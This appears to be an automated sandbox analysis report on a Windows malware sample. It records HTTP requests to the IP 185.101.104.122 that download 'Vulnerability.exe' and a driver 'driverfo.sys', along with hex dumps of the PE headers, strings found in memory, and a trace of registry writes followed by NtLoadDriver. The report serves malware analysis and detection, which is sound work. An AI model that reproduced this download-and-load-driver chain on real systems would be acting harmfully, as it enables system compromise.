Source: Binary string: rosoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb source: Vulnerability.exe, 00000004.00000002.1880929870.000002181C20C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ConnectionKeep-Alive/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb source: Vulnerability.exe, 00000004.00000003.1878660285.000002181DB0C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c9cf7868ff6d4bda773.pdbv source: Vulnerability.exe, 00000004.00000002.1881228820.000002181DB3F000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880399638.000002181DB3F000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1879912102.000002181DB3E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb;k source: Vulnerability.exe, 00000004.00000002.1880738454.0000005CC92F5000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdbFranciscw source: Vulnerability.exe, 00000004.00000002.1881228820.000002181DB3F000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880399638.000002181DB3F000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1879912102.000002181DB3E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: msdl.microsoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb\ source: Vulnerability.exe, 00000004.00000002.1880929870.000002181C20C000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\Vulnerability.exe | Code function: 4_2_00007FF7CC423B60 GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,CloseHandle,CloseHandle,abort
Source: global traffic | HTTP traffic detected:
  HTTP/1.1 200 OK
  Date: Fri, 25 Oct 2024 06:10:12 GMT
  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
  Last-Modified: Thu, 03 Oct 2024 17:41:18 GMT
  ETag: "23800-623960fde9891"
  Accept-Ranges: bytes
  Content-Length: 145408
  Keep-Alive: timeout=5, max=100
  Connection: Keep-Alive
  Content-Type: application/x-msdownload
  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 7d e7 f2 38 39 86 9c 6b 39 86 9c 6b 39 86 9c 6b 30 fe 0f 6b 2f 86 9c 6b 3f 07 98 6a 33 86 9c 6b 3f 07 9f 6a 3d 86 9c 6b 3f 07 99 6a 1b 86 9c 6b 3f 07 9d 6a 3f 86 9c 6b 72 fe 9d 6a 28 86 9c 6b 39 86 9d 6b 31 87 9c 6b 56 07 95 6a 3e 86 9c 6b 56 07 63 6b 38 86 9c 6b 56 07 9e 6a 38 86 9c 6b 52 69 63 68 39 86 9c 6b 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 3e d7 fe 66 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 26 00 4e 01 00 00 ee 00 00 00 00 00 00 b4 48 01 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 70 02 00 00 04 00 00 00 00 00 00 03 00 60 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b4 06 02 00 cc 01 00 00 00 50 02 00 e8 01 00 00 00 40 02 00 30 0f 00 00 00 00 00 00 00 00 00 00 00 60 02 00 08 01 00 00 b0 d7 01 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 d8 01 00 28 00 00 00 70 d6 01 00 40 01 00 00 00 00 00 00 00 00 00 00 00 60 01 00 10 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 93 4c 01 00 00 10 00 00 00 4e 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 cb 00 00 00 60 01 00 00 cc 00 00 00 52 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 f0 0c 00 00 00 30 02 00 00 06 00 00 00 1e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 30 0f 00 00 00 40 02 00 00 10 00 00 00 24 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 e8 01 00 00 00 50 02 00 00 02 00 00 00 34 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 08 01 00 00 00 60 02 00 00 02 00 00 00 36 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected:
  HTTP/1.1 200 OK
  Date: Fri, 25 Oct 2024 06:10:12 GMT
  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
  Last-Modified: Sat, 19 Oct 2024 00:07:08 GMT
  ETag: "4d00-624c93353bec7"
  Accept-Ranges: bytes
  Content-Length: 19712
  Keep-Alive: timeout=5, max=99
  Connection: Keep-Alive
  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 11 41 b6 a6 55 20 d8 f5 55 20 d8 f5 55 20 d8 f5 55 20 d8 f5 54 20 d8 f5 1e 58 d9 f4 56 20 d8 f5 55 20 d9 f5 4e 20 d8 f5 1e 58 db f4 53 20 d8 f5 1e 58 dc f4 50 20 d8 f5 3a a1 dd f4 54 20 d8 f5 3a a1 da f4 54 20 d8 f5 52 69 63 68 55 20 d8 f5 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 d4 f7 12 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 26 00 18 00 00 00 0e 00 00 00 00 00 00 00 10 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00 00 0a 00 00 00 00 00 00 00 00 80 00 00 00 04 00 00 63 5e 00 00 01 00 60 41 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 50 00 00 fc 00 00 00 00 2a 00 00 00 23 00 00 00 70 00 00 24 00 00 00 60 32 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 31 00 00 40 01 00 00 00 00 00 00 00 00 00 00 00 30 00 00 c8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d2 12 00 00 00 10 00 00 00 14 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 68 2e 72 64 61 74 61 00 00 50 06 00 00 00 30 00 00 00 08 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 48 2e 64 61 74 61 00 00 00 8c 00 00 00 00 40 00 00 00 02 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c8 2e 70 64 61 74 61 00 00 fc 00 00 00 00 50 00 00 00 02 00 00 00 22 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 48 49 4e 49 54 00 00 00 00 04 03 00 00 00 60 00 00 00 04 00 00 00 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 62 2e 72 65 6c 6f 63 00 00 24 00 00 00 00 70 00 00 00 02 00 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: Joe Sandbox View | IP Address: 104.26.0.5 104.26.0.5
Source: Joe Sandbox View | JA3 fingerprint: ce5f3254611a8c095a3d821d44539877
Source: global traffic | HTTP traffic detected:
GET /Vulnerability.exe HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: 185.101.104.122
Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
GET /driverfo.sys HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: 185.101.104.122
Connection: Keep-Alive
Source: unknown | TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: global traffic | DNS traffic detected: DNS query: keyauth.win
Source: lUAc7lqa56.exe, 00000000.00000003.1796909009.00000245E108A000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1798955245.00000245E108A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.101.104.122/D
Source: lUAc7lqa56.exe, 00000000.00000002.1934554654.00000245E10BC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.101.104.122/VulneH)C
Source: lUAc7lqa56.exe, 00000000.00000002.1934554654.00000245E1024000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000002.1934554654.00000245E1083000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.101.104.122/Vulnerability.exe
Source: lUAc7lqa56.exe, 00000000.00000002.1934554654.00000245E1024000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.101.104.122/Vulnerability.exe&
Source: lUAc7lqa56.exe, 00000000.00000003.1798879988.00000245E10BD000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1796890061.00000245E10B2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.101.104.122/Vulnerability.exeJ)A
Source: lUAc7lqa56.exe, 00000000.00000003.1799028406.00000245E1050000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1796945638.00000245E1050000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.101.104.122/Vulnerability.exeLMEMXxZ
Source: lUAc7lqa56.exe, 00000000.00000003.1796909009.00000245E108A000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1798955245.00000245E108A000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000002.1934554654.00000245E1083000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.101.104.122/Vulnerability.exeT
Source: lUAc7lqa56.exe, 00000000.00000003.1796945638.00000245E1050000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.101.104.122/Vulnerability.exeZZC:
Source: lUAc7lqa56.exe, 00000000.00000003.1799028406.00000245E1042000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000002.1934985033.00007FF79005B000.00000002.00000001.01000000.00000003.sdmp, lUAc7lqa56.exe, 00000000.00000002.1934554654.00000245E1083000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.101.104.122/driverfo.sys
Source: lUAc7lqa56.exe, 00000000.00000003.1798955245.00000245E108A000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000002.1934554654.00000245E1083000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.101.104.122/driverfo.sys$63
Source: lUAc7lqa56.exe, 00000000.00000003.1798955245.00000245E108A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.101.104.122/driverfo.sys.122/h
Source: lUAc7lqa56.exe, 00000000.00000003.1798955245.00000245E108A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.101.104.122/driverfo.sys.6
Source: lUAc7lqa56.exe, 00000000.00000003.1798955245.00000245E108A000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000002.1934554654.00000245E1083000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.101.104.122/driverfo.sysC6
Source: lUAc7lqa56.exe, 00000000.00000002.1934985033.00007FF79005B000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: http://185.101.104.122/driverfo.sysC:
Source: lUAc7lqa56.exe, 00000000.00000003.1798955245.00000245E108A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.101.104.122/driverfo.sysH6W
Source: lUAc7lqa56.exe, 00000000.00000003.1799028406.00000245E1050000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.101.104.122/driverfo.sysLMEMHhX
Source: lUAc7lqa56.exe, 00000000.00000003.1798955245.00000245E108A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.101.104.122/driverfo.sysM6
Source: lUAc7lqa56.exe, 00000000.00000003.1799028406.00000245E1050000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.101.104.122/driverfo.sysUUC:
Source: lUAc7lqa56.exe, 00000000.00000003.1799028406.00000245E1050000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.101.104.122/driverfo.syst
Source: lUAc7lqa56.exe, 00000000.00000003.1798955245.00000245E108A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.101.104.122/driverfo.syst6C
Source: lUAc7lqa56.exe, 00000000.00000003.1796909009.00000245E108A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.101.104.122/h
Source: driverfo[1].sys.0.dr, driverfo.sys.0.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: lUAc7lqa56.exe, 00000000.00000003.1798879988.00000245E10BD000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1798955245.00000245E10A5000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1798879988.00000245E10B2000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1799010054.00000245E10AF000.00000004.00000020.00020000.00000000.sdmp, driverfo[1].sys.0.dr, driverfo.sys.0.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: lUAc7lqa56.exe, 00000000.00000003.1798879988.00000245E10BD000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1798955245.00000245E10A5000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1798879988.00000245E10B2000.00000004.00000020.00020000.00000000.sdmp, driverfo[1].sys.0.dr, driverfo.sys.0.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: lUAc7lqa56.exe, 00000000.00000003.1798955245.00000245E10A5000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1799010054.00000245E10AF000.00000004.00000020.00020000.00000000.sdmp, driverfo[1].sys.0.dr, driverfo.sys.0.dr | String found in binary or memory: http://certs.apple.com/wwdrg3.der01
Source: driverfo[1].sys.0.dr, driverfo.sys.0.dr | String found in binary or memory: http://crl.apple.com/root.crl0
Source: Vulnerability.exe, 00000004.00000000.1821071304.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp, Vulnerability.exe, 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp, Vulnerability[1].exe.0.dr, Vulnerability.exe.0.dr, nULoYBmSWb.4.dr | String found in binary or memory: http://crl.globalsign.com/gs/gscodesigng2.crl0
Source: Vulnerability.exe, 00000004.00000000.1821071304.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp, Vulnerability.exe, 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp, Vulnerability[1].exe.0.dr, Vulnerability.exe.0.dr, nULoYBmSWb.4.dr | String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingg2.crl0T
Source: Vulnerability.exe, 00000004.00000000.1821071304.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp, Vulnerability.exe, 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp, Vulnerability[1].exe.0.dr, Vulnerability.exe.0.dr, nULoYBmSWb.4.dr | String found in binary or memory: http://crl.globalsign.net/root.crl0
Source: driverfo[1].sys.0.dr, driverfo.sys.0.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: lUAc7lqa56.exe, 00000000.00000003.1798879988.00000245E10BD000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1798955245.00000245E10A5000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1798879988.00000245E10B2000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1799010054.00000245E10AF000.00000004.00000020.00020000.00000000.sdmp, driverfo[1].sys.0.dr, driverfo.sys.0.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: lUAc7lqa56.exe, 00000000.00000003.1798879988.00000245E10BD000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1798955245.00000245E10A5000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1798879988.00000245E10B2000.00000004.00000020.00020000.00000000.sdmp, driverfo[1].sys.0.dr, driverfo.sys.0.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: driverfo[1].sys.0.dr, driverfo.sys.0.dr | String found in binary or memory: http://ocsp.apple.com/ocsp03-applerootca0.
Source: lUAc7lqa56.exe, 00000000.00000003.1798955245.00000245E10A5000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1799010054.00000245E10AF000.00000004.00000020.00020000.00000000.sdmp, driverfo[1].sys.0.dr, driverfo.sys.0.dr | String found in binary or memory: http://ocsp.apple.com/ocsp03-wwdrg3010
Source: lUAc7lqa56.exe, 00000000.00000003.1798879988.00000245E10BD000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1798955245.00000245E10A5000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1798879988.00000245E10B2000.00000004.00000020.00020000.00000000.sdmp, driverfo[1].sys.0.dr, driverfo.sys.0.dr | String found in binary or memory: http://ocsp.digicert.com0A
Source: driverfo[1].sys.0.dr, driverfo.sys.0.dr | String found in binary or memory: http://ocsp.digicert.com0C
Source: lUAc7lqa56.exe, 00000000.00000003.1798879988.00000245E10BD000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1798955245.00000245E10A5000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1798879988.00000245E10B2000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1799010054.00000245E10AF000.00000004.00000020.00020000.00000000.sdmp, driverfo[1].sys.0.dr, driverfo.sys.0.dr | String found in binary or memory: http://ocsp.digicert.com0X
Source: Vulnerability.exe, 00000004.00000000.1821071304.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp, Vulnerability.exe, 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp, Vulnerability[1].exe.0.dr, Vulnerability.exe.0.dr, nULoYBmSWb.4.dr | String found in binary or memory: http://ocsp2.globalsign.com/gscodesigng20
Source: Vulnerability.exe, 00000004.00000000.1821071304.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp, Vulnerability.exe, 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp, Vulnerability[1].exe.0.dr, Vulnerability.exe.0.dr, nULoYBmSWb.4.dr | String found in binary or memory: http://secure.globalsign.com/cacert/gscodesigng2.crt04
Source: Vulnerability.exe, 00000004.00000000.1821071304.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp, Vulnerability.exe, 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp, Vulnerability[1].exe.0.dr, Vulnerability.exe.0.dr, nULoYBmSWb.4.dr | String found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingg2.crt0
Source: lUAc7lqa56.exe, 00000000.00000002.1934985033.00007FF79005B000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://curl.haxx.se/docs/http-cookies.html
Source: lUAc7lqa56.exe, 00000000.00000002.1934554654.00000245E1024000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://keyauth.win/api/1.2/
Source: lUAc7lqa56.exe, 00000000.00000002.1934554654.00000245E1024000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://keyauth.win/api/1.2/4-100I
Source: lUAc7lqa56.exe, 00000000.00000002.1934554654.00000245E1024000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://keyauth.win/api/1.2/fo.sysv
Source: lUAc7lqa56.exe, 00000000.00000002.1934985033.00007FF79005B000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://keyauth.win/api/1.2/http://185.101.104.122/Vulnerability.exeC:
Source: Vulnerability.exe, 00000004.00000002.1881188072.000002181DB0F000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880478460.000002181DB0E000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1878660285.000002181DB0C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com
Source: lUAc7lqa56.exe, 00000000.00000003.1796909009.00000245E108A000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1798955245.00000245E108A000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000002.1934554654.00000245E1083000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.comR
Source: Vulnerability.exe, 00000004.00000003.1879680608.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1879183448.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880308333.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880992310.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://vsblobprodscussu5shard10.blob.core.windows.net/
Source: Vulnerability.exe, 00000004.00000003.1879183448.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://vsblobprodscussu5shard10.blob.core.windows.net/Y
Source: Vulnerability.exe, 00000004.00000003.1879912102.000002181DB3E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://vsblobprodscussu5shard10.blob.core.windows.net/b-4712e0edc5a240eabf23330d7df68e77/AB6E94A209
Source: Vulnerability.exe, 00000004.00000003.1879680608.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1879183448.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880308333.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880992310.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://vsblobprodscussu5shard10.blob.core.windows.net/qy
Source: lUAc7lqa56.exe, 00000000.00000003.1798955245.00000245E10A5000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1799010054.00000245E10AF000.00000004.00000020.00020000.00000000.sdmp, driverfo[1].sys.0.dr, driverfo.sys.0.dr | String found in binary or memory: https://www.apple.com/certificateauthority/0
Source: lUAc7lqa56.exe, 00000000.00000002.1935015299.00007FF790082000.00000004.00000001.01000000.00000003.sdmp | String found in binary or memory: https://www.behance.net/madetypeFree
Source: Vulnerability.exe, 00000004.00000000.1821071304.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp, Vulnerability.exe, 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp, Vulnerability[1].exe.0.dr, Vulnerability.exe.0.dr, nULoYBmSWb.4.dr | String found in binary or memory: https://www.globalsign.com/repository/0
Source: Vulnerability.exe, 00000004.00000000.1821071304.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp, Vulnerability.exe, 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp, Vulnerability[1].exe.0.dr, Vulnerability.exe.0.dr, nULoYBmSWb.4.dr | String found in binary or memory: https://www.globalsign.com/repository/03
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown | Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown | HTTPS traffic detected: 104.26.0.5:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: Vulnerability.exe, 00000004.00000003.1878962418.000002181E231000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: _stub_UserRegisterRawInputDevicesmemstr_be539d0e-1

System Summary

Source: lUAc7lqa56.exe | Static PE information: .vmp0 and .vmp1 section names
Source: C:\Windows\Vulnerability.exe | Code function: 4_2_00007FF7CC422900 RegCreateKeyW,RegSetKeyValueW,RegCloseKey,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,_invalid_parameter_noinfo_noreturn,RegSetKeyValueW,RegCloseKey,RegCloseKey,GetModuleHandleA,GetProcAddress,GetProcAddress,RtlAdjustPrivilege,RtlInitUnicodeString,NtLoadDriver,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@P6AAEAVios_base@1@AEAV21@@Z@Z,??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@J@Z,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,_invalid_parameter_noinfo_n